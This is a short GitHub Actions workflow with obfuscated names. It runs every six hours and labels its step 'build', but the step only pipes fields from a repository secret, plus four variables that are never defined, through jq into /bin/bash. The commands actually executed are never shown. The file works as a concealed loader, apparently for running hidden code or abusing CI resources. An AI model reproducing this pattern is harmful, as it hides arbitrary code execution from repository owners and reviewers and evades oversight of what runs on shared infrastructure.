name: dijingyun3456

on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dijingyun3456
        env:
          c241: ${{ secrets.c241 }}
        run: |
          echo $c241 | jq -r .z906 | /bin/bash
          echo $dn3104 | jq -r .fnx5599 | /bin/bash
          echo $i7166 | jq -r .l93556 | /bin/bash
          echo $skb25 | jq -r .g050 | /bin/bash
          echo $nwhwc1536 | jq -r .vn3603 | /bin/bash

